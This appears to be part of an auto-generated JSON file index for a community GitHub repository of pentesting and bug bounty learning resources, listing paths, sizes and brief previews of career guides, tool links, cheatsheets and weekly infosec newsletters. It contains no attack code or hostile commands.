  },
  {
    "path": "CyberSecurityJobs/Careers",
    "chars": 2699,
    "preview": "1. | [cyber-security-careers/](https://www.sans.org/cybersecurity-careers/20-coolest-cyber-security-careers/)\n\n# Securit"
  },
  {
    "path": "CyberSecurityJobs/CoverLetter.md",
    "chars": 3839,
    "preview": "# Cover letter tips for Cybersecurity Jobs :\n \n 1. Highlight your experience\n 2. Show your passion for the job and talk "
  },
  {
    "path": "CyberSecurityJobs/CybersecuityDiscipline.md",
    "chars": 3699,
    "preview": "\nAfter Reading this I hope this will help you in understanding which disciplines best fit your abilities, experience, an"
  },
  {
    "path": "CyberSecurityJobs/For_Jobs.md",
    "chars": 4289,
    "preview": "**For Job** :\n\n- 1. Understand domain & choose your Goal.\n- 2. Find your Mentor.\n- 3. Validate your Career and Goal with"
  },
  {
    "path": "CyberSecurityJobs/Intership_Advice.md",
    "chars": 3328,
    "preview": "## 1. Internship \n[Advise by iamthefrogy](https://github.com/iamthefrogy)\n  \n  Shall I go for an internship in any compa"
  },
  {
    "path": "CyberSecurityJobs/InterviewQA.md",
    "chars": 2601,
    "preview": "0. All for one - interview questions - https://drive.google.com/drive/folders/17Brt0bx__E5Dd7PeR_09wPylidpDFZ7M?usp=shar"
  },
  {
    "path": "CyberSecurityJobs/Jobs.md",
    "chars": 6606,
    "preview": "## Table of Contents for Jobs\n\n- [0. Weekly_Cybersecurity Hiring](#0-weekly-cybersecurity-hiring-october-2022)\n- [1. Typ"
  },
  {
    "path": "CyberSecurityJobs/Readme.md",
    "chars": 4170,
    "preview": "Welcome to [Resthacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-RESETHACKER) :)\n\n[![IT Job Helpdesk]("
  },
  {
    "path": "CyberSecurityJobs/SalaryNegotiation.md",
    "chars": 953,
    "preview": "NOTE: Percentage of people that don't negotiate their salary are very high but If everything goes really smooth then you"
  },
  {
    "path": "CyberSecurityJobs/internships.md",
    "chars": 74,
    "preview": "[Cybersecurity internship for Women](https://www.dsci.in/cyber-shikshaa/)\n"
  },
  {
    "path": "CyberSecurityJobs/resume.md",
    "chars": 2175,
    "preview": "Index | Topics\n-- | --\n**1** | Resume Writing & Advise\n**2** | LinkedIn – Why create a quality profile?\n\n\n## 1. Resume W"
  },
  {
    "path": "ISO-HelpDesk/Readme.md",
    "chars": 308,
    "preview": "# ISO HELPDESK\n\n**1** [This article discusses \"NIST Cybersecurity Framework vs ISO 27001/27002 vs NIST 800-53 vs Secure "
  },
  {
    "path": "LFI/Lfi.md",
    "chars": 38,
    "preview": "\n\nhttps://github.com/g0tmi1k/LFISuite\n"
  },
  {
    "path": "LFI/Lfitools.md",
    "chars": 102,
    "preview": "**LFI Tools**\n\n\nIndex | LFI Tools\n---|---\n**1** | [LFISuits](https://github.com/D35m0nd142/LFISuite)\n\n"
  },
  {
    "path": "LFI/Readme.md",
    "chars": 291,
    "preview": "**LFI(Local File Inclusion )**\n\n\nIndex | Content\n---|---\n**1** | [LFI Documentation]()\n**2** | [LFI Practice labs]()\n**3"
  },
  {
    "path": "Pentesting Cheatsheets/Readme.md",
    "chars": 370,
    "preview": "# Pentesting Cheatsheets\n\nAuthor | Title\n-- | --\n**1** I-red Team | [Pentesting Cheatsheets]( https://www.ired.team/offe"
  },
  {
    "path": "Pentesting Cheatsheets/cheetsheets.md",
    "chars": 1277,
    "preview": "# Pentesting Cheatsheets\n\nAuthor | Title\n-- | --\nChris Dale | [BurpSuite Cheatsheet v1.0](Pentesting Cheatsheets/cheetsh"
  },
  {
    "path": "Pentesting-BugbountyINDEX.md",
    "chars": 1649,
    "preview": "[ResourcesMindmap](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/ResourcesMindmap.md)\n\nPentesting-Bugboun"
  },
  {
    "path": "PentestingChecklist/Readme.md",
    "chars": 1156,
    "preview": "# Checklist\nAuthor | Checklist\n-- | --\n**1** six2dez | [Pentesting Web checklist](https://six2dez.gitbook.io/pentest-boo"
  },
  {
    "path": "PentestingReports/PreEngagement.md",
    "chars": 11983,
    "preview": "# Pre-engagement: \nHelp yourself to get your 1st Pentesting client and prepare yourself for client meeting?\n\n    ## UNDE"
  },
  {
    "path": "PentestingReports/Readme.md",
    "chars": 4106,
    "preview": "Note: Contents inside the **RESETHACKER** is to help the community and all\nThe content belongs to the respective authors"
  },
  {
    "path": "PentestingReports/pentestingvideos.md",
    "chars": 1270,
    "preview": "Index  |  Pentest Videos\n-- | --\n    \n**1** | [Pentest Reporting and Best Practices -HackerOne](https://www.youtube.com/"
  },
  {
    "path": "Pentesting_for_Researchers/PTplatform.md",
    "chars": 1595,
    "preview": "## FREE LABS TO TEST YOUR PENTEST/CTF SKILLS 👩‍💻👀\n\nIndex | Websites\n-- | --\n- | [SANS Challenger](http://www.smashthesta"
  },
  {
    "path": "Pentesting_for_Researchers/Pentest-Reports.md",
    "chars": 844,
    "preview": "[𝗙𝗥𝗘𝗘 𝗥𝗘𝗦𝗢𝗨𝗥𝗖𝗘𝗦 / 𝗣𝗘𝗡𝗧𝗘𝗦𝗧 𝗥𝗘𝗣𝗢𝗥𝗧] - By @Gabrielle_BGB\n\nWant to upgrade your reporting skills?\nCheck out these resources\n"
  },
  {
    "path": "Pentesting_for_Researchers/Readme.md",
    "chars": 5290,
    "preview": "# PEN TESTERS (Under Development)\n1. Company have PEN TESTERS team to conduct pentesting.\n2. Company HIRING PEN TEST SER"
  },
  {
    "path": "README.md",
    "chars": 32158,
    "preview": "## Let's crowdsource our infosec learning with [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/What-Is-"
  },
  {
    "path": "ResetCybersecuirty/CONTRIBUTING.md",
    "chars": 1881,
    "preview": "# Contribution Guidelines\n\nPlease note that this project is released with a **No Code or Low Code contribution**. \n\nCont"
  },
  {
    "path": "ResetCybersecuirty/CVE's/CVE_Assests/Beta.md",
    "chars": 91951,
    "preview": "# Security Patched,  CVE : poc, analysis and Exploit.\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pe"
  },
  {
    "path": "ResetCybersecuirty/CVE's/CVE_Assests/Readme.md",
    "chars": 70733,
    "preview": "# Security Patched,  CVE : poc, analysis and Exploit.\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pe"
  },
  {
    "path": "ResetCybersecuirty/CVE's/POC_collecctions.md",
    "chars": 193,
    "preview": "- SkyLink\n- Red Teaming TTPs // Developing a POC for CVE-2022-26923 with Powershell and CommandoVM - https://youtu.be/z8"
  },
  {
    "path": "ResetCybersecuirty/CVE's/Readme.md",
    "chars": 107823,
    "preview": "# Security Patched,  CVE : poc, analysis and Exploit.\n\n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pe"
  },
  {
    "path": "ResetCybersecuirty/Readme.md",
    "chars": 9984,
    "preview": "# WEEKLY INFOSEC UPDATE : v0.7\n \n- An initiative by [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/Wha"
  },
  {
    "path": "ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md",
    "chars": 3535,
    "preview": "## [Weekly_Infosec_Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty) C"
  },
  {
    "path": "ResetCybersecuirty/SupportedBy/SponserUs.md",
    "chars": 3364,
    "preview": "( Note :Currently We're not looking for any Sponsership. Thank you)\n\n# Sponsor & Support\nGrow your brand, generate leads"
  },
  {
    "path": "ResetCybersecuirty/SupportedBy/Suggestions.md",
    "chars": 1681,
    "preview": "# Sugestions & Probelm:\n\n1. Make it more organized or Easy to read.\n2. TL;DR or Small summury to the article would be re"
  },
  {
    "path": "ResetCybersecuirty/SupportedBy/Team&Contributors.md",
    "chars": 2460,
    "preview": "## WEEKLY INFOSEC UPDATE : v0.3\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![]("
  },
  {
    "path": "ResetCybersecuirty/SupportedBy/Understanding.md",
    "chars": 6046,
    "preview": "# Understanding community Operation and contributions:\n\nProject: **Weekly Inofsec update**\n\nProblem We're solving ? \nWe "
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Contribute.md",
    "chars": 4292,
    "preview": "## India Centric Crowdsource InfoSec Community that make sence to Wrold.\n\n## Contribute & Give back to community | Crowd"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Logs.md",
    "chars": 1870,
    "preview": "# Log Book \n- 8/12/2022 : Added \"Bug Hunters Segment and Hackerone Reports Segment\" section inside \"Vulenrabilty/bugs Re"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Readme.md",
    "chars": 11,
    "preview": "Working On\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_Trail_Beginners.md",
    "chars": 15172,
    "preview": "## Weekly Infosec Update - Beginners Friendly \n\n<details> \n<summary><b>\n📰📰📰 Community Infused NEWS 📰📰📰  </b></summary>  "
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_Trail_For_Professionals.md",
    "chars": 24080,
    "preview": "#### Hey Hackers, I hope you’ve been doing well on the weekend! and quote of Week is \"Don't rush the Process. Good Thing"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_v0.3.md",
    "chars": 23236,
    "preview": " #### Hey Hackers, I hope you’ve been doing well! \n Here are the Agenda for \"Weekly infosec Update\" 04 (23rd - 30th Aug "
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/WIU_v0.4.md",
    "chars": 1540,
    "preview": "### This week we have made some changes in New version of \"Weekly Security Update\" v0.4\n\n1. Added nevigation Bar (called"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/WIU_Templete/helpdesk-Github.md",
    "chars": 2407,
    "preview": "<h3 align=\"center\">Github HelpDesk &amp; and Documentaion  </h3>\n\n<h3 align=\"center\">Want to contribute to this project?"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Course_Review/CEH.md",
    "chars": 2579,
    "preview": "ResetHacker Community : Course Reviews\n\nDISCLAIMER: These are ResetHacker members personal opinions and fellings! Make y"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Course_Review/Readme.md",
    "chars": 3353,
    "preview": "ResetHacker Community : Course Reviews\n\nDISCLAIMER: These are ResetHacker members personal opinions and fellings! Make y"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Future_updates.md",
    "chars": 661,
    "preview": "# Community Requirenment, Suggestion and feedback :\n\n- Newsletter in TLDR formate.\n- Move to website.\n\n## Bugbounty\n- Pa"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Readme.md",
    "chars": 1,
    "preview": "\n"
  },
  {
    "path": "ResetCybersecuirty/WIUAsset/Weekly_Infosec_Update_Segment/Tools/Readme.md",
    "chars": 7903,
    "preview": "## Weekly Cybersecurity 01 : v0.2\n**Date : 2nd - 23rd Aug 2022\n\n\n\n### Projects, Tools, RAT's And Ransomeware **\n*Misc To"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_00.md",
    "chars": 10210,
    "preview": "# Weekly Cybersecurity update 00: v0.1\nIdea is to give back to community and save time(because time is valuable) with HI"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_01.md",
    "chars": 11895,
    "preview": "## v0.2 Weekly Cybersecurity 01 \n\n   **Current Issue date : 9th August 2022 : 7:00am**\n    \n    Last Issue date : 2 Aug "
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_02.md",
    "chars": 16829,
    "preview": "## Weekly infosec Update 02 \n\n   **Issue date : 16th August 2022 : 7:00am**\n    \n    Last Issue date : 2nd Aug 2022 : 7:"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_03.md",
    "chars": 15802,
    "preview": " #### Hey Hackers, I hope you’ve been doing well! \n Here are the Agenda for \"Weekly infosec Update\" 03 (16th - 22nd Aug "
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_04.md",
    "chars": 23236,
    "preview": " #### Hey Hackers, I hope you’ve been doing well! \n Here are the Agenda for \"Weekly infosec Update\" 04 (23rd - 30th Aug "
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_05.md",
    "chars": 25891,
    "preview": " #### Hey Hackers, I hope you’ve been doing well on weekend! \n Here are the Agenda for \"Weekly infosec Update\" v0.4 (31t"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_06.md",
    "chars": 25714,
    "preview": " #### Hey Hackers, I hope you’ve been doing well on weekend! and quote Of Week is \"Don't rush the Process. Good Things T"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_07.md",
    "chars": 26342,
    "preview": " #### Hey Hackers, I hope you’ve been doing well on weekend! and quote of Week is \"Don't rush the Process. Good Things T"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_08.md",
    "chars": 22243,
    "preview": "#### Hey Hackers, I hope you’ve been doing well on the weekend! and quote of Week is \"Don't rush the Process. Good Thing"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_09.md",
    "chars": 33176,
    "preview": "#### Hey Hackers, I hope you’ve been doing well on the weekend! and quote of Week is \"Don't rush the Process. Good Thing"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_10.md",
    "chars": 30443,
    "preview": "#### Hey Hackers, I hope you’ve been doing well on the weekend! and quote of Week is \"Don't rush the Process. Good Thing"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_11.md",
    "chars": 30638,
    "preview": "#### Hey Hackers, I hope you have all enjoyed your Diwali celebrations!! \n > Here are the agenda for *Weekly infosec Upd"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_12.md",
    "chars": 30225,
    "preview": "#### Hey Hackers, I hope you have all enjoyed your Weekend!! \n\n > Here are the agenda for Weekly infosec Update v0.7 : 2"
  },
  {
    "path": "ResetCybersecuirty/code-of-conduct.md",
    "chars": 3240,
    "preview": "# Contributor Covenant Code of Conduct\n\n## Our Pledge\n\nIn the interest of fostering an open and welcoming environment, w"
  },
  {
    "path": "Sqlinjection.md",
    "chars": 451,
    "preview": "*RESETSQLi()**\n\nSQL injection(SQLi) is a kind of injection vulnerability in which the attacker tries to inject arbitrary"
  },
  {
    "path": "cheetsheets/BurpSuiteCheetsheet.md",
    "chars": 1146,
    "preview": "## Hunting for Vulnerabilities with Burp Suite CheatSheet v1.0 :\n \n-**Chris Dale** @chrisadale:- Users can contribute wi"
  },
  {
    "path": "cheetsheets/Nano.md",
    "chars": 2103,
    "preview": "#File handling\n\n- Ctrl+S  Save current file\n- Ctrl+O  Offer to write file (\"Save as\")\n- Ctrl+R  Insert a file into curre"
  },
  {
    "path": "cheetsheets/Readme.md",
    "chars": 543,
    "preview": "# Pentesting Cheatsheets\n\nAuthor | Title\n-- | --\nChris Dale | [BurpSuite Cheatsheet v1.0](/cheetsheets/BurpSuiteCheetshe"
  },
  {
    "path": "cheetsheets/metasploitcheetsheet.md",
    "chars": 291,
    "preview": "# Cheetsgeet for Metasploit \nCheatsheet | Metasploit\n-- | --\nCheat Sheet | [Metasploit Cheat Sheet v1.](https://www.kitp"
  },
  {
    "path": "cheetsheets/nmapcheetsheet.md",
    "chars": 594,
    "preview": "Credit goes to the respective Author and Team RESETHACKER.\n\n# Cheetsgeet for NMAP \nCheatsheet | NMAP\n-- | --\nCheat Sheet"
  },
  {
    "path": "enterprises.md",
    "chars": 825,
    "preview": "# Enterprises\n\n- Who conducts VAPT?\n> Updating Soon\n\n- Benefit of VAPT? by Simran Singh\n> VAPT offers various benefits t"
  },
  {
    "path": "license",
    "chars": 6478,
    "preview": "CC0 1.0 Universal\n\nStatement of Purpose\n\nThe laws of most jurisdictions throughout the world automatically confer exclus"
  }
]

// ... and 2 more files (download for full content)

About this extraction

This page contains the full source code of the RESETHACKER-COMMUNITY/Pentesting-Bugbounty GitHub repository, extracted and formatted as plain text. The extraction includes 94 files (831.1 KB), approximately 229.7k tokens.

Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.
